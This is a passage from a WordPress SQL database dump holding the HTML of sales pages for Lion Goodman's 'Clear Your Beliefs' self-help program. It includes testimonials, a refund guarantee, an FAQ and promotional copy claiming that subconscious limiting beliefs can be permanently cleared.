Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\r\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>Optional:</strong> Professional Coaching Sessions.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\r\n<p style="text-align: center">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\r\n\r\n&nbsp;\r\n\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<strong>– G. J., software developer</strong>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<strong>~ C.T., Performance and Life Coach</strong>\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<strong>– M.M., International Business Consultant</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\r\n\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 00:09:23', '2014-12-12 05:09:23', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2021, 2, '2014-12-12 12:20:03', '2014-12-12 17:20:03', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\r\n&nbsp;\r\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong>\r\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\r\n\r\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\r\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\r\n<h1>\r\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\r\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\r\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\r\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses<br>I’ll get,and how much it costs...</a>\r\n&nbsp;&nbsp;			<h1>\r\nWhy Does This Happen?</h1>\r\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\r\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\r\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\r\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\r\n\r\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\r\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\r\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\r\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\r\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\r\n\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\r\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\r\n\r\n<strong><em>I’m not enough.</em></strong>\r\n<strong><em>I can’t do it.</em></strong>\r\n<strong><em>I’m not worthy.</em></strong>\r\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\r\n<strong><em>I’m all alone.</em></strong>\r\n\r\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\r\n<strong><em>There’s something wrong with me.</em></strong>\r\n<strong><em>I’m fundamentally flawed.</em></strong>\r\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\r\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\r\n\r\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\r\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\r\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left">The same thing is true in your subconscious mind:</p>\r\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\r\n<p style="text-align: left"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> It’s that simple.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n\r\nWhy did I say that?\r\nWhat’s wrong with me?\r\nWhy didn’t I follow through?\r\nWhy did I react that way?\r\nWhat the hell just happened?\r\n\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n\r\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\r\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\r\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\r\n\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n\r\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\r\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\r\n\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n\r\n<p>You''re no longer held back by old beliefs and stories.</p>\r\n<p>There''s no resistance to doing what needs to be done.</p>\r\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\r\n\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n\r\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\r\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\r\nGive you the power to change your experiences – and your circumstances – at will.\r\nShow you how to gain mastery over your moods, perceptions, and responses.\r\n\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n\r\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\r\n\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n\r\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\r\nRemove resistance and barriers\r\nOpen doors to new opportunities\r\nEliminate pain and suffering from the past\r\nExperience more fulfillment in your relationships\r\nAttract more abundance and prosperity\r\nIncrease your energy, vitality, and productivity\r\n\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n\r\n&nbsp;\r\n\r\n<h1>A Message from Lion Goodman...</h1>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\nDear Explorer:\r\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my 